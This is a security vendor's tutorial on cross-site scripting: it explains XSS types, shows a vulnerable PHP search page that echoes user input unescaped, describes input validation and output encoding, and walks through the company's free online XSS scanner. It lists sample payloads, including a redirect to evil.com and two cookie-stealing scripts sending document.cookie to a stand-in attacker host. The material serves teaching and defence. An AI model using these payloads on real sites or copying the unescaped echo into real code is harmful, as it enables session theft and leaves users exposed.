Security for everyone
How To

How To Test XSS Online and Free

SecurityForEveryone

Security for Everyone

12/Sep/22

In this post, we'll teach you how to utilize Generic XSS Scanner, a free and internet-based tool that may be used to detect XSS.

Before we get into how to use our free XSS scanning tools, let's quickly refresh our memories.

Click on the link below if you need to jump ahead quickly.

What is XSS?

XSS (Cross Site Scripting) is a type of vulnerability found in web applications that allow attackers to inject malicious code into web pages viewed by other users. This can allow the attacker to steal cookies, hijack user sessions, or redirect the user to malicious sites.

To exploit XSS vulnerabilities, after injecting malicious JavaScript code into a web page, the code must be executed by the victim's browser.

What is the Risk of XSS?

XSS is one of the most common web application security risks. It can be used to:

  • Hijack user sessions
  • Steal cookies
  • Deface websites
  • Redirect users to malicious sites
  • Inject malware onto the victim's machine

What are the types of XSS?

There are three types of XSS vulnerabilities:

Reflected XSS - The malicious code is not stored on the web server. It is sent in an HTTP request and reflected off the web server, such as in an error message, search result, or any response that includes user input.

Stored XSS - The malicious code is permanently stored on the server, such as in a database, and displayed to users when they request a page.

DOM-based XSS - This type of attack does not involve injecting code into a web page. Instead, it uses vulnerabilities in client-side JavaScript to execute malicious code.

Sample Code For XSS Vulnerability

Let's think that we have a blog app named example.com and there is a search bar for users to find necessary posts. When a user searches for something on our site, we show them a message that says "Results for {searched_terms}" and then blog posts containing those terms.

So basic codes should look like the below:

Search bar code:

<form action="get" action="/search"> <input type="text" name="term"> </form>

Result page code:

# Result Header Results for <?php echo $_GET['term'] ?>

<!-- Loop for blog post result -->

If a user searches for "security" term, our page would look like this.

URL: example.com/search?term=security

Result Header: Results For security

And everyone who visits the URL example.com/search?term=security will show the same page. Is everything alright? There isn't a problem, is there? How about if user search some think like that: <b>bold</b>

URL: example.com/search?term=<b>bold</b>

Result Header: Results For bold

<b> tags placed in the search term appear as HTML code when displayed in browser search results. It will be the same for any HTML and JavaScript codes.

From an attacker's perspective, how can this be beneficial? What if we search for : <script>window.location="https://www.evil.com"</script>

URL: example.com/search?term=<script>window.location="https://www.evil.com"</script>

Result Header: Results For

If you visit the URL, you will be redirected to evil.com without any notification because our JavaScript code is rendered in the browser.

Here are some other XSS attack payloads:

  • Steal cookies: <script>img=new+image();img.src="http://attacker/" + document.cookie;</script>
  • Another payload to steal: <script>document.write("<iframe src='http://attacker/cookiegrabber.php?c=" + document.cookie + "'></iframe>");</script>
  • Display a popup box: <script>alert('xss');</script>

Fixing XSS Vulnerability

There are two main ways to fix XSS:

Input Validation: Only allow characters that are known to be safe. This can be done using blacklisting or whitelisting. This is not a comprehensive solution, but applying it correctly will indeed reduce the danger.

  • Blacklisting - This approach involves identifying and removing dangerous characters from user input. The problem with this method is that it's difficult to anticipate all the ways an attacker might try to inject malicious code.
  • Whitelisting - This approach involves only allowing known good characters in user input. This is a more effective method, but it can be difficult to implement.

Output Encoding: When displaying user input, encode it in a way that will prevent the browser from interpreting it as HTML code. The only effective technique to fix an XSS vulnerability. There are different types of encoding depending on where the data will be displayed.

For example, if the data will be displayed in an HTML attribute, you would use HTML entity encoding. If the data will be used as part of a JavaScript code, you would use JavaScript escaping.

How to Use Generic XSS Scanner: Test XSS Online

We will use the Free and Online Generic XSS Scanner. There's no need for any technical knowledge; all you have to do is click a few buttons. However, if you are an expert there are several settings and parameters that you can adjust to scan.

Simplest Way: Use Fast Scan

The fast scan is a great way to use a free and online generic XSS scanner. You need to click one button only. Just enter any URL you want to scan and click the 'Start Scan' button.

But it has some limitations:

  • If you want to scan the parameters of a form used in a page (like a login form), use the HTML form parser.
  • The fast scan allows you to quickly check any parameter in the query string using the HTTP GET method.
  • Use expert mode if the application accepts data using other HTTP methods (e.g., POST, PUT, or DELETE).
  • If the application requires authentication to access a web page you wish to scan, use export mode with the necessary authentication header.

Second Way: HTML Form Parser

The HTML form parser feature helps you identify and scan any form parameters that are used in web pages. In web applications, forms are used to submit data to the server (e.g., login, contact, or search forms). Just enter any URL containing the form you want to test and click the `Analyze` button.

Our engine will parse all the forms with all parameters. Click the `Scan` button near the parameters you want to test.

  • Use expert mode if the application accepts data using other HTTP methods (e.g., POST, PUT, or DELETE).
  • If the application requires authentication to access a web page you wish to scan, use expert mode with the necessary authentication header.

Third Way: Use Expert Mode

The expert mode allows you to customize all parameters of an HTTP request. You can select the HTTP method (GET, POST, PUT, DELETE), HTTP headers, set headers, and request body.

Here are some hints:

  • Use authentication headers if your web page needs authentications.
  • You can set any HTTP methods and use any valid header as you want.
  • Request body can be set with any HTTP method.

Results

There will be three types of results from your scan:

  • Compact: One-word output to see whether vulnerable or not.
  • Detail: Some other detail of output such as parameters and vulnerability type
  • Video: Commands that we used to check, the output of scan, vulnerability types. Watch all processes of the scan.

You can export the results as PDF, HTML, or CSV.

If you need any help, please do not hesitate to contact us via support page.

Happy and secure days for all!

cyber security services for everyone one. Free security tools, continuous vulnerability scanning and many more.
Try it yourself,
control security posture